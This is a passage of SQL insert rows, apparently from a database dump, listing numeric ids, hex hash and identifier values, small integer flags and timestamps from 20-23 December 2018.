(41214, '832101422a765b14fbaf3b9b7abfec87', 'b453f7c003bf64ff', 0, 2, 1, '2018-12-20 04:18:01'),
(41215, '504e3e0e5662a1ce669f8bc4ade241ce', '83bb13387505b354', 0, 2, 1, '2018-12-20 04:28:19'),
(41216, '504e3e0e5662a1ce669f8bc4ade241ce', '83bb13387505b354', 0, 2, 1, '2018-12-20 04:29:52'),
(41217, '504e3e0e5662a1ce669f8bc4ade241ce', '83bb13387505b354', 0, 2, 1, '2018-12-20 04:30:03'),
(41218, '495e23954ff9c5ec26a437221cf9e90a', 'fbf0576065758144', 0, 2, 1, '2018-12-20 04:51:50'),
(41219, '495e23954ff9c5ec26a437221cf9e90a', 'fbf0576065758144', 0, 2, 1, '2018-12-20 04:52:18'),
(41220, '495e23954ff9c5ec26a437221cf9e90a', 'fbf0576065758144', 0, 2, 1, '2018-12-20 04:52:34'),
(41221, '495e23954ff9c5ec26a437221cf9e90a', 'fbf0576065758144', 0, 2, 1, '2018-12-20 04:52:46'),
(41222, '495e23954ff9c5ec26a437221cf9e90a', 'fbf0576065758144', 0, 2, 1, '2018-12-20 04:53:18'),
(41223, 'c3f9f44258b87c2713804bf948e0c279', '3ddcad1db6b3520f', 0, 2, 1, '2018-12-20 05:30:38'),
(41224, 'b110753a8e19f4fa98f1051573e40d87', 'c43d25eee9507c17', 0, 2, 1, '2018-12-20 05:45:41'),
(41225, '1e4b7ee09461e9f832182ddd217836a7', 'fb561ff1c6544e43', 0, 2, 1, '2018-12-20 06:08:41'),
(41226, '1e4b7ee09461e9f832182ddd217836a7', 'fb561ff1c6544e43', 0, 2, 1, '2018-12-20 06:10:42'),
(41227, '1e4b7ee09461e9f832182ddd217836a7', 'fb561ff1c6544e43', 0, 2, 1, '2018-12-20 06:11:54'),
(41228, '9819f6040a4f3330b10b60324e03bf71', 'c31b81fc0df4c5be', 0, 2, 1, '2018-12-20 06:25:42'),
(41229, '9819f6040a4f3330b10b60324e03bf71', 'c31b81fc0df4c5be', 0, 2, 1, '2018-12-20 06:25:52'),
(41230, '5026a546c747113b1806a406aa9b28e6', '7c2fa8ac97126d44', 0, 2, 1, '2018-12-20 06:42:47'),
(41231, '5026a546c747113b1806a406aa9b28e6', '7c2fa8ac97126d44', 0, 2, 1, '2018-12-20 06:43:42'),
(41232, '5026a546c747113b1806a406aa9b28e6', '7c2fa8ac97126d44', 0, 2, 1, '2018-12-20 06:44:14'),
(41233, '5026a546c747113b1806a406aa9b28e6', '7c2fa8ac97126d44', 0, 2, 1, '2018-12-20 06:44:37'),
(41234, '98bedce95eb71c7fa1fe024220503013', 'baab00bb9eaede26', 0, 2, 1, '2018-12-20 06:55:15'),
(41235, '7fed3fc30b0fe785e75237317e4dd3ee', 'fed10d1e71fcaaeb', 0, 2, 1, '2018-12-20 06:57:52'),
(41236, '6eec4c15c5870688a00ba26b64166ad6', 'f095249d169d87b8', 0, 2, 1, '2018-12-20 07:15:05'),
(41237, 'b353e8a16d34cae31c73c303d371445c', '4bc1bfd1f90e68e5', 0, 2, 1, '2018-12-20 08:14:43'),
(41238, '4c94f34d832eb6646825efd54d0390a8', 'ff744a4d90b6a515', 0, 2, 1, '2018-12-20 09:20:48'),
(41239, '4c94f34d832eb6646825efd54d0390a8', 'ff744a4d90b6a515', 0, 2, 1, '2018-12-20 09:44:58'),
(41240, '4c94f34d832eb6646825efd54d0390a8', 'ff744a4d90b6a515', 0, 2, 1, '2018-12-20 09:46:56'),
(41241, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2018-12-20 09:48:49'),
(41242, 'a6d7d4a678c48c7d4cbd5fcc6da80b1a', 'a83e11812aff7ff7', 0, 2, 1, '2018-12-20 10:04:31'),
(41243, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-20 10:21:38'),
(41244, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-20 10:21:54'),
(41245, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-20 10:21:54'),
(41246, '6a2e88e8aade51ccc12fe95eee164b08', '51df446c19685386', 0, 2, 1, '2018-12-20 11:45:44'),
(41247, '54fffe36d162af73f0d98f613a6b72d2', '05e81a9eb0a36bb5', 0, 2, 1, '2018-12-20 11:48:30'),
(41248, '28ebfdcb090bfd3619313b0469d473e4', '94d13561d625a0d6', 0, 2, 1, '2018-12-20 11:52:33'),
(41249, '4c94f34d832eb6646825efd54d0390a8', 'ff744a4d90b6a515', 0, 2, 1, '2018-12-20 12:06:36'),
(41250, '3c5832cb2c2d1cc5ec9f864cba4127fc', '22905843105c275f', 0, 2, 1, '2018-12-20 12:28:43'),
(41251, '71b5d2fd634b56e40fa58c78569e1759', 'e3e8bf7c648efeb4', 0, 2, 1, '2018-12-20 13:22:19'),
(41252, 'da71dbe75a2262c4a4bed06091725807', 'ec18b138536ee06e', 0, 2, 1, '2018-12-20 13:59:28'),
(41253, 'c6d6fd8b2cbf1a0c4299f2195166a634', 'd962df27d9158431', 0, 2, 1, '2018-12-20 14:09:17'),
(41254, 'c6d6fd8b2cbf1a0c4299f2195166a634', 'd962df27d9158431', 0, 2, 1, '2018-12-20 15:00:23'),
(41255, '1af8cf8a5e523d0c37418a7ee1fb7d14', 'a1f62104c4643f50', 0, 2, 1, '2018-12-20 16:05:00'),
(41256, '7ce5174f72ececd1e036e6eb5a51f886', '5145691a95de9886', 0, 2, 1, '2018-12-20 16:26:23'),
(41257, '1b761b6091280268ef65558b3b11a47c', 'f7fef20839e7b60f', 0, 2, 1, '2018-12-20 16:39:06'),
(41258, 'd42b22ce028164cf714b66dadc22af7a', 'c5b42dbb0bb6215a', 0, 2, 1, '2018-12-20 16:53:12'),
(41259, 'bf9ad0660f3944311a5d8d819c600f24', '1f0840ad23d29e53', 0, 2, 1, '2018-12-20 17:07:40'),
(41260, 'bf9ad0660f3944311a5d8d819c600f24', '1f0840ad23d29e53', 0, 2, 1, '2018-12-20 17:08:16'),
(41261, 'cf27c6dc6035ca4abd7d25fb1de0ead4', 'fb561ff1c6544e43', 0, 2, 1, '2018-12-20 17:10:04'),
(41262, 'cf27c6dc6035ca4abd7d25fb1de0ead4', 'fb561ff1c6544e43', 0, 2, 1, '2018-12-20 17:12:25'),
(41263, 'cf27c6dc6035ca4abd7d25fb1de0ead4', 'fb561ff1c6544e43', 0, 2, 1, '2018-12-20 17:14:05'),
(41264, 'cf27c6dc6035ca4abd7d25fb1de0ead4', 'fb561ff1c6544e43', 0, 2, 1, '2018-12-20 17:14:26'),
(41265, 'cf27c6dc6035ca4abd7d25fb1de0ead4', 'fb561ff1c6544e43', 0, 2, 1, '2018-12-20 17:14:52'),
(41266, 'cf27c6dc6035ca4abd7d25fb1de0ead4', 'fb561ff1c6544e43', 0, 2, 1, '2018-12-20 17:15:45'),
(41267, 'cf27c6dc6035ca4abd7d25fb1de0ead4', 'fb561ff1c6544e43', 0, 2, 1, '2018-12-20 17:17:22'),
(41268, 'cf27c6dc6035ca4abd7d25fb1de0ead4', 'fb561ff1c6544e43', 0, 2, 1, '2018-12-20 17:18:04'),
(41269, 'cf27c6dc6035ca4abd7d25fb1de0ead4', 'fb561ff1c6544e43', 0, 2, 1, '2018-12-20 17:18:28'),
(41270, 'cf27c6dc6035ca4abd7d25fb1de0ead4', 'fb561ff1c6544e43', 0, 2, 1, '2018-12-20 17:19:15'),
(41271, 'cf27c6dc6035ca4abd7d25fb1de0ead4', 'fb561ff1c6544e43', 0, 2, 1, '2018-12-20 17:19:54'),
(41272, 'cf27c6dc6035ca4abd7d25fb1de0ead4', 'fb561ff1c6544e43', 0, 2, 1, '2018-12-20 17:20:29'),
(41273, 'cf27c6dc6035ca4abd7d25fb1de0ead4', 'fb561ff1c6544e43', 0, 2, 1, '2018-12-20 17:21:24'),
(41274, 'cf27c6dc6035ca4abd7d25fb1de0ead4', 'fb561ff1c6544e43', 0, 2, 1, '2018-12-20 17:22:03'),
(41275, '7bf1ee1de3ac6651b9dcbcdfe415590c', '3588180e6471bbc2', 0, 2, 1, '2018-12-20 17:40:30'),
(41276, 'c904441304899544c59a8be5c9bf06c7', 'fd9e13a25e929cea', 0, 2, 1, '2018-12-20 18:06:25'),
(41277, '3470b6074c16248c915ff196865acd1c', 'c43c4f30ef77bfb6', 0, 2, 1, '2018-12-20 20:10:02'),
(41278, '3ee0fe14cd98b96e9a38be0ca0307d8c', 'abe6c8ead564b456', 0, 2, 1, '2018-12-20 20:18:57'),
(41279, 'bf9ad0660f3944311a5d8d819c600f24', '1f0840ad23d29e53', 0, 2, 1, '2018-12-20 21:13:02'),
(41280, 'bf9ad0660f3944311a5d8d819c600f24', '1f0840ad23d29e53', 0, 2, 1, '2018-12-20 21:14:02'),
(41281, '2e8f86247833150ca42cde308f319bb7', 'df1438431862f0dd', 0, 2, 1, '2018-12-20 21:35:31'),
(41282, '2e8f86247833150ca42cde308f319bb7', 'df1438431862f0dd', 0, 2, 1, '2018-12-20 21:37:31'),
(41283, '2e8f86247833150ca42cde308f319bb7', 'df1438431862f0dd', 0, 2, 1, '2018-12-20 21:37:35'),
(41284, '2e8f86247833150ca42cde308f319bb7', 'df1438431862f0dd', 0, 2, 1, '2018-12-20 21:39:08'),
(41285, '2e8f86247833150ca42cde308f319bb7', 'df1438431862f0dd', 0, 2, 1, '2018-12-20 21:40:18'),
(41286, 'faab0abbe6f7be1d447fe4b7d7396990', '0affbb1df9b78246', 0, 2, 1, '2018-12-20 23:09:36'),
(41287, 'ba42a6eca32adb8fb66fb74f11d02fc4', 'd131367378b77fb4', 0, 2, 1, '2018-12-20 23:18:00'),
(41288, 'ba42a6eca32adb8fb66fb74f11d02fc4', 'd131367378b77fb4', 0, 2, 1, '2018-12-20 23:18:44'),
(41289, 'ba42a6eca32adb8fb66fb74f11d02fc4', 'd131367378b77fb4', 0, 2, 1, '2018-12-20 23:19:01'),
(41290, 'ba42a6eca32adb8fb66fb74f11d02fc4', 'd131367378b77fb4', 0, 2, 1, '2018-12-20 23:19:22'),
(41291, 'f4733a20354f5544b08e31423356a237', '1d1bea46f753d90d', 0, 2, 1, '2018-12-20 23:59:03'),
(41292, 'f4733a20354f5544b08e31423356a237', '1d1bea46f753d90d', 0, 2, 1, '2018-12-20 23:59:47'),
(41293, 'f4733a20354f5544b08e31423356a237', '1d1bea46f753d90d', 0, 2, 1, '2018-12-21 00:00:28'),
(41294, 'f4733a20354f5544b08e31423356a237', '1d1bea46f753d90d', 0, 2, 1, '2018-12-21 00:01:01'),
(41295, 'f4733a20354f5544b08e31423356a237', '1d1bea46f753d90d', 0, 2, 1, '2018-12-21 00:03:40'),
(41296, 'f4733a20354f5544b08e31423356a237', '1d1bea46f753d90d', 0, 2, 1, '2018-12-21 00:04:06'),
(41297, '30e37c6f61c89e84521dabc805086958', 'b603708ce5ac82cb', 0, 2, 1, '2018-12-21 05:51:23'),
(41298, '597621af8a07667fa9d746a74a03d0b3', '93272af50ad5435b', 0, 2, 1, '2018-12-21 06:30:48'),
(41299, '4dd06fd82f45211a6f913983b3b3d3ea', '8f72b20c171d8958', 0, 2, 1, '2018-12-21 07:07:55'),
(41300, 'de1374cd82beef64c784f84f308d4444', '7f2ac72ae344e915', 0, 2, 1, '2018-12-21 07:35:49'),
(41301, 'de1374cd82beef64c784f84f308d4444', '7f2ac72ae344e915', 0, 2, 1, '2018-12-21 07:37:40'),
(41302, '3765eb48eae59b1965103171c388f330', 'ff744a4d90b6a515', 0, 2, 1, '2018-12-21 09:16:04'),
(41303, 'c6d6fd8b2cbf1a0c4299f2195166a634', 'd962df27d9158431', 0, 2, 1, '2018-12-21 09:17:28'),
(41304, '741b9a1d1753ca6b0b9fa42b56b45ab8', 'fca802e07dd6a9f1', 0, 2, 1, '2018-12-21 10:26:21'),
(41305, '658a4b520db736928b04239660841cdd', '32c91e80a9ea3ef5', 0, 2, 1, '2018-12-21 10:46:25'),
(41306, '658a4b520db736928b04239660841cdd', '32c91e80a9ea3ef5', 0, 2, 1, '2018-12-21 10:54:51'),
(41307, '5a072ed30ee34d17401e75770724804c', 'ce90b47636b3d5b6', 0, 2, 1, '2018-12-21 11:27:43'),
(41308, '6f680a2e26598c332b2b1b8d2a7094d3', '379f7f49001ab22e', 0, 2, 1, '2018-12-21 13:10:21'),
(41309, 'dcd7eb60f6e5f749949ad5ab2abf40d0', '2d5dcf881503c53d', 0, 2, 1, '2018-12-21 13:45:41'),
(41310, 'dd3b696fc9bda1831d5d960b074113c8', 'bae82211d7bf93ed', 0, 2, 1, '2018-12-21 13:51:04'),
(41311, 'be714923be243226a8d23f024ab984c5', '3b1ba2e59e73a481', 0, 2, 1, '2018-12-21 13:54:11'),
(41312, '082a8b2f57cd57332873720bb8ba4fe4', '3588180e6471bbc2', 0, 2, 1, '2018-12-21 14:18:04'),
(41313, 'c6d6fd8b2cbf1a0c4299f2195166a634', 'd962df27d9158431', 0, 2, 1, '2018-12-21 14:24:41'),
(41314, 'be714923be243226a8d23f024ab984c5', '3b1ba2e59e73a481', 0, 2, 1, '2018-12-21 15:03:22'),
(41315, 'dcd86b1110d7bbb6c06cc3ec161e2e95', '69104e6c9331d3ab', 0, 2, 1, '2018-12-21 15:20:11'),
(41316, 'ec7d9413faab45977984e44c3131bc09', 'e1a5c07842a2c5b4', 0, 2, 1, '2018-12-21 15:21:20'),
(41317, 'ec7d9413faab45977984e44c3131bc09', 'e1a5c07842a2c5b4', 0, 2, 1, '2018-12-21 15:25:32'),
(41318, '06ef4565ea31b28ca4341c855218e887', '407f5dc75c6f4a5d', 0, 2, 1, '2018-12-21 15:47:10'),
(41319, '8ce5af1aa71d93f6d3a46644b6109df2', '13cf6835f161bb99', 0, 2, 1, '2018-12-21 15:59:51'),
(41320, 'c102c8d4fadaef9a5a7a827052324523', '5152bd783ea0a646', 0, 2, 1, '2018-12-21 16:03:39'),
(41321, '21dd601515ce8640d2bf90ba81bc903f', 'd31531cade680958', 0, 2, 1, '2018-12-21 16:29:48'),
(41322, '0a220bbed120bf41cb5c9172adc62a45', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-21 16:36:22'),
(41323, '0f776b89fb905095bb56db181bb9de5e', '8d88166adc4031d2', 0, 2, 1, '2018-12-21 17:25:13'),
(41324, '92eaead743644779abc1d4456a6dd0fa', '45a52a0c478b0753', 0, 2, 1, '2018-12-21 17:51:25'),
(41325, '854d91b882dfafd43f05289f7a8732ee', '743e6cb2eec91f86', 0, 2, 1, '2018-12-21 19:40:31'),
(41326, '60dd51683750fee7c5faf43d9d5cdcd6', '754387d5c3a7836c', 0, 2, 1, '2018-12-21 19:42:06'),
(41327, '60dd51683750fee7c5faf43d9d5cdcd6', '754387d5c3a7836c', 0, 2, 1, '2018-12-21 19:46:41'),
(41328, '5b8efae644ba72d57c4d4884e0fb75d4', 'e2142c435ad6461b', 0, 2, 1, '2018-12-21 20:05:21'),
(41329, '27a2b618889a43c29186ddccc92c7b79', '40cefe5da08d34c2', 0, 2, 1, '2018-12-21 20:58:38'),
(41330, '27a2b618889a43c29186ddccc92c7b79', '40cefe5da08d34c2', 0, 2, 1, '2018-12-21 20:59:34'),
(41331, '27a2b618889a43c29186ddccc92c7b79', '40cefe5da08d34c2', 0, 2, 1, '2018-12-21 21:04:06'),
(41332, '27a2b618889a43c29186ddccc92c7b79', '40cefe5da08d34c2', 0, 2, 1, '2018-12-21 21:07:29'),
(41333, '27a2b618889a43c29186ddccc92c7b79', '40cefe5da08d34c2', 0, 2, 1, '2018-12-21 21:07:53'),
(41334, '27a2b618889a43c29186ddccc92c7b79', '40cefe5da08d34c2', 0, 2, 1, '2018-12-21 21:10:14'),
(41335, '58b47d0d1e8c61accde431497108aa55', 'f22b5e30fba38fa6', 0, 2, 1, '2018-12-21 21:38:44'),
(41336, '3f548635e3f5977b9b9ae10eed4c1a2f', 'e85abe19dccbb40a', 0, 2, 1, '2018-12-21 21:44:05'),
(41337, '6416f06400e637a86e7dcc091baccfd8', '40dee314390afaca', 0, 2, 1, '2018-12-21 22:20:26'),
(41338, '72e852971869d6b6cc2a8bd1b3278da8', '66dfae1ce2e8cd90', 0, 2, 1, '2018-12-21 23:35:02'),
(41339, '499be4dd791d8c587a56c60eae8f82c3', '41244de61e527d43', 0, 2, 1, '2018-12-22 01:40:07'),
(41340, 'e9c3f64d01e8d9c167e2ea0d90f5cf6e', '66dfae1ce2e8cd90', 0, 2, 1, '2018-12-22 01:41:02'),
(41341, 'd354fd659966ad5a0fb8058547a50e3b', '4638c3a841cdd484', 0, 2, 1, '2018-12-22 04:48:57'),
(41342, 'd354fd659966ad5a0fb8058547a50e3b', '4638c3a841cdd484', 0, 2, 1, '2018-12-22 04:50:11'),
(41343, '3ef13c34103e6f204839a6ddf2ab7fc2', '12385fb49175d29b', 0, 2, 1, '2018-12-22 04:50:53'),
(41344, 'bc6463cbd40f280361546cf8dd72fcc7', '73662954d9991535', 0, 2, 1, '2018-12-22 05:00:42'),
(41345, 'bc6463cbd40f280361546cf8dd72fcc7', '73662954d9991535', 0, 2, 1, '2018-12-22 05:01:14'),
(41346, 'bc6463cbd40f280361546cf8dd72fcc7', '73662954d9991535', 0, 2, 1, '2018-12-22 05:01:19'),
(41347, 'bc6463cbd40f280361546cf8dd72fcc7', '73662954d9991535', 0, 2, 1, '2018-12-22 05:01:52'),
(41348, 'd7fd3dac9a81259442b3e3d07ff1576e', '754c430c5939bb7f', 0, 2, 1, '2018-12-22 05:25:21'),
(41349, 'd205893c81c825c8d256652c0bea2b45', '78d5baba20e8b00e', 0, 2, 1, '2018-12-22 06:22:26'),
(41350, '5af76da3afeb851f55c418a0443245e2', '00b9a56230dada73', 0, 2, 1, '2018-12-22 06:30:00'),
(41351, '5af76da3afeb851f55c418a0443245e2', '00b9a56230dada73', 0, 2, 1, '2018-12-22 06:30:45'),
(41352, '5af76da3afeb851f55c418a0443245e2', '00b9a56230dada73', 0, 2, 1, '2018-12-22 06:30:58'),
(41353, '532537fd96864c09ebcd70460138b258', 'fbf0576065758144', 0, 2, 1, '2018-12-22 06:58:09'),
(41354, 'c5a1ef39f8767d89ab45e2ae2148394f', '78d5baba20e8b00e', 0, 2, 1, '2018-12-22 07:01:32'),
(41355, 'c5a1ef39f8767d89ab45e2ae2148394f', '78d5baba20e8b00e', 0, 2, 1, '2018-12-22 07:02:17'),
(41356, '4f86462a360feeb41675dbe671052d5c', 'be53779c7926d097', 0, 2, 1, '2018-12-22 08:43:24'),
(41357, '23917c4e94eefbf5c1f101cac885e29b', '710de8ac382d2571', 0, 2, 1, '2018-12-22 10:40:19'),
(41358, 'c616cbd2498bd9c20263b797f588b847', '1bbdad53047e28fc', 0, 2, 1, '2018-12-22 10:40:31'),
(41359, '9bd1bd29be5e92ac215e31323e85cfa8', '78e991b1579a8a7c', 0, 2, 1, '2018-12-22 11:19:35'),
(41360, '21abdf2c29a09cb5ead7995942343417', '51df446c19685386', 0, 2, 1, '2018-12-22 12:12:47'),
(41361, '849cb9827af42ced112b9f108593a6d5', 'abe6c8ead564b456', 0, 2, 1, '2018-12-22 12:57:41'),
(41362, '1af261d370c05a4f5e99258e499a2171', 'cf452938c1abb8bf', 0, 2, 1, '2018-12-22 13:08:23'),
(41363, 'cc236e4af57aa237c848c248eb08b277', '875753affacf0d6c', 0, 2, 1, '2018-12-22 13:15:00'),
(41364, 'cc236e4af57aa237c848c248eb08b277', '875753affacf0d6c', 0, 2, 1, '2018-12-22 13:19:59'),
(41365, 'cc236e4af57aa237c848c248eb08b277', '875753affacf0d6c', 0, 2, 1, '2018-12-22 13:20:57'),
(41366, 'cc236e4af57aa237c848c248eb08b277', '875753affacf0d6c', 0, 2, 1, '2018-12-22 13:21:25'),
(41367, 'cc236e4af57aa237c848c248eb08b277', '875753affacf0d6c', 0, 2, 1, '2018-12-22 13:21:36'),
(41368, 'e3e72799eeeb85fc52063c5d357dc9f8', '561a5a8fd2ec3c2f', 0, 2, 1, '2018-12-22 13:59:27'),
(41369, 'b91e796072ed359c19660aaa2540fabf', 'e6ed437d44944b2c', 0, 2, 1, '2018-12-22 14:00:45'),
(41370, '1ba7ff1595e6160f7ae531584b9322ed', 'ff107a3f1a798997', 0, 2, 1, '2018-12-22 14:39:32'),
(41371, '19232d237a9a9994140cfdc82952dc9d', 'a4ebf9a6b97bb4ff', 0, 2, 1, '2018-12-22 15:05:19'),
(41372, '19232d237a9a9994140cfdc82952dc9d', 'a4ebf9a6b97bb4ff', 0, 2, 1, '2018-12-22 15:06:40'),
(41373, '19232d237a9a9994140cfdc82952dc9d', 'a4ebf9a6b97bb4ff', 0, 2, 1, '2018-12-22 15:16:44'),
(41374, '46437d009734d1e009e1de40c95ccada', '320bf2e21f88f143', 0, 2, 1, '2018-12-22 16:42:02'),
(41375, '90a9ce4e7158871405733b5903f8e5e9', '9d7e30f1551a3621', 0, 2, 1, '2018-12-22 17:46:33'),
(41376, '2f955483bbcb6ab2de41ebc1fd5364d2', '0c9d6aa8068886be', 0, 2, 1, '2018-12-22 18:28:11'),
(41377, 'f9cc403065dace1a8fb5baec3876e271', '624d6937076d1188', 0, 2, 1, '2018-12-22 18:52:35'),
(41378, '63e182be61a0f8edc63abd98bc5f6b0e', '7a2b99c31f4c5089', 0, 2, 1, '2018-12-22 19:48:56'),
(41379, '63e182be61a0f8edc63abd98bc5f6b0e', '7a2b99c31f4c5089', 0, 2, 1, '2018-12-22 19:50:19'),
(41380, '95629b0ea168fafc0e18f16a7b7b6145', '8d96482d446e2629', 0, 2, 1, '2018-12-22 20:57:32'),
(41381, 'bc1a11f68b97abc3bc22bf71bd9af170', 'b3744fa11554662a', 0, 2, 1, '2018-12-22 22:19:20'),
(41382, '1bb412e1fde57cda8c6f6d3dfafe660f', 'e82a1a36e98d6bf2', 0, 2, 1, '2018-12-22 22:22:30'),
(41383, '5ec3f25c963200f0817f24e771a927e7', 'f4330fbc46e42b06', 0, 2, 1, '2018-12-22 22:24:18'),
(41384, 'bc1a11f68b97abc3bc22bf71bd9af170', 'b3744fa11554662a', 0, 2, 1, '2018-12-22 22:26:29'),
(41385, '7dcdc136dd8faa4bbf2529f086850cea', '52f6e90774ae3764', 0, 2, 1, '2018-12-22 22:44:46'),
(41386, '1d23bb7adc31d3135c08866220ae71ce', 'f30aca79167f7e50', 0, 2, 1, '2018-12-22 22:47:41'),
(41387, '308ddc8908f8740bad313a3da77b80e3', '6d5d47d0a06047be', 0, 2, 1, '2018-12-22 23:36:37'),
(41388, '0d70453dd589b13ff63bc70876b1f256', '2af24ef85063606c', 0, 2, 1, '2018-12-22 23:38:28'),
(41389, '5b766d3e93142f680f7015eb158b695b', '30ff94a44dfbf556', 0, 2, 1, '2018-12-22 23:40:01'),
(41390, 'f4b54fa8779d4bb7482a47da941aa70f', '114a358d7677583d', 0, 2, 1, '2018-12-23 01:12:41'),
(41391, 'df8cae44ee66657d57c98a770eb344d4', '7db17032e9a6c1ec', 0, 2, 1, '2018-12-23 01:25:55'),
(41392, 'df8cae44ee66657d57c98a770eb344d4', '7db17032e9a6c1ec', 0, 2, 1, '2018-12-23 01:26:42'),
(41393, '7ea26636c26ccc6c7487bdceaf77798d', '0fffe137cb55e7fb', 0, 2, 1, '2018-12-23 04:39:07'),
(41394, '7ea26636c26ccc6c7487bdceaf77798d', '0fffe137cb55e7fb', 0, 2, 1, '2018-12-23 04:39:41'),
(41395, '51088fdc63e74c77130da429742b8da0', '46713cac27a94b83', 0, 2, 1, '2018-12-23 05:00:55'),
(41396, '51088fdc63e74c77130da429742b8da0', '46713cac27a94b83', 0, 2, 1, '2018-12-23 05:02:02'),
(41397, '8ce88aae46e5239881a55c68f509deae', 'b335903010e84d54', 0, 2, 1, '2018-12-23 05:11:40'),
(41398, '8ce88aae46e5239881a55c68f509deae', 'b335903010e84d54', 0, 2, 1, '2018-12-23 05:12:10'),
(41399, 'ba0db7451372c4cbc1ef7552d012df9a', '5a6e6fc8df61f23d', 0, 2, 1, '2018-12-23 05:15:51'),
(41400, '5519bab6e8981f4ae50eefd376717e49', '08bdfaee86369392', 0, 2, 1, '2018-12-23 05:20:25'),
(41401, '5519bab6e8981f4ae50eefd376717e49', '08bdfaee86369392', 0, 2, 1, '2018-12-23 05:20:37'),
(41402, '6bcbc5f09037f92d6753e9d93fab82d4', '1f2a82cd68d8bbd5', 0, 2, 1, '2018-12-23 05:23:40'),
(41403, 'c59a2b5fbc977b577f8b0089a79846f8', '4df5ced8675ad994', 0, 2, 1, '2018-12-23 05:25:13'),
(41404, '8148a2580ff19320a05d895def2a8476', 'df27b9a2919a8206', 0, 2, 1, '2018-12-23 05:28:36'),
(41405, '8148a2580ff19320a05d895def2a8476', 'df27b9a2919a8206', 0, 2, 1, '2018-12-23 05:30:03'),
(41406, '42add00ccf5ccdca983dc31de5b73e93', '3bd36d6429a9f245', 0, 2, 1, '2018-12-23 05:31:16'),
(41407, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2018-12-23 05:34:19'),
(41408, 'c23750d84ad2a87e358782ac29389e45', 'f6df341deb80eec0', 0, 2, 1, '2018-12-23 05:41:00'),
(41409, 'c23750d84ad2a87e358782ac29389e45', 'f6df341deb80eec0', 0, 2, 1, '2018-12-23 05:44:06'),
(41410, 'c23750d84ad2a87e358782ac29389e45', 'f6df341deb80eec0', 0, 2, 1, '2018-12-23 05:45:37'),
(41411, 'c23750d84ad2a87e358782ac29389e45', 'f6df341deb80eec0', 0, 2, 1, '2018-12-23 05:45:46'),
(41412, 'c23750d84ad2a87e358782ac29389e45', 'f6df341deb80eec0', 0, 2, 1, '2018-12-23 05:46:22'),
(41413, 'c59a2b5fbc977b577f8b0089a79846f8', '4df5ced8675ad994', 0, 2, 1, '2018-12-23 05:48:46'),
(41414, '8148a2580ff19320a05d895def2a8476', 'df27b9a2919a8206', 0, 2, 1, '2018-12-23 05:50:11'),
(41415, 'c23750d84ad2a87e358782ac29389e45', 'f6df341deb80eec0', 0, 2, 1, '2018-12-23 05:50:12'),
(41416, 'c23750d84ad2a87e358782ac29389e45', 'f6df341deb80eec0', 0, 2, 1, '2018-12-23 05:50:40'),
(41417, '8148a2580ff19320a05d895def2a8476', 'df27b9a2919a8206', 0, 2, 1, '2018-12-23 05:50:49'),
(41418, 'f424fe57f70453e3460d8dd2da89e962', '2622b37d94f09b78', 0, 2, 1, '2018-12-23 05:54:24'),
(41419, '159014ef2721b738dfc5dafa6cd80a6a', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-23 05:54:33'),
(41420, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2018-12-23 05:55:35'),
(41421, '8148a2580ff19320a05d895def2a8476', 'df27b9a2919a8206', 0, 2, 1, '2018-12-23 05:56:12'),
(41422, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 05:57:15'),
(41423, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 05:58:15'),
(41424, 'c23750d84ad2a87e358782ac29389e45', 'f6df341deb80eec0', 0, 2, 1, '2018-12-23 05:58:22'),
(41425, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 05:59:32'),
(41426, '159014ef2721b738dfc5dafa6cd80a6a', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-23 05:59:43'),
(41427, 'c23750d84ad2a87e358782ac29389e45', 'f6df341deb80eec0', 0, 2, 1, '2018-12-23 05:59:55'),
(41428, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 06:00:08'),
(41429, '4e164722af4c715c7ba9257758df1685', '8c0ff6c07aa4b540', 0, 2, 1, '2018-12-23 06:00:26'),
(41430, 'c23750d84ad2a87e358782ac29389e45', 'f6df341deb80eec0', 0, 2, 1, '2018-12-23 06:01:06'),
(41431, 'e028dc836f3fe2ed07e74773c5beba2f', 'f8f70c95a9dd1c3e', 0, 2, 1, '2018-12-23 06:01:51'),
(41432, 'bcb6f45303647417891ae646317a049d', '3a5b76abea3ea51a', 0, 2, 1, '2018-12-23 06:04:13'),
(41433, '8b2b6ca1c2a82cd0c0f98b4ee48a09c0', 'fbf0576065758144', 0, 2, 1, '2018-12-23 06:04:26'),
(41434, 'bcb6f45303647417891ae646317a049d', '3a5b76abea3ea51a', 0, 2, 1, '2018-12-23 06:05:45'),
(41435, '8bce1d5fe222855831caf44fed4cd832', '1ea0ff7ee1e4e11d', 0, 2, 1, '2018-12-23 06:06:01'),
(41436, '82c1038815b8f12122de780d26e809ff', 'f52a42a05787db8d', 0, 2, 1, '2018-12-23 06:06:02'),
(41437, '42add00ccf5ccdca983dc31de5b73e93', '3bd36d6429a9f245', 0, 2, 1, '2018-12-23 06:06:29'),
(41438, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 06:06:31'),
(41439, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 06:07:23'),
(41440, 'ae1f4e0bf1df65f4f54a973dfcdab00d', '6a9dd6888bcb8fcc', 0, 2, 1, '2018-12-23 06:08:02'),
(41441, 'b21ce49d82ff351b4af685fd2c10018c', '575b738595cdb2f5', 0, 2, 1, '2018-12-23 06:08:40'),
(41442, 'bcb6f45303647417891ae646317a049d', '3a5b76abea3ea51a', 0, 2, 1, '2018-12-23 06:09:24'),
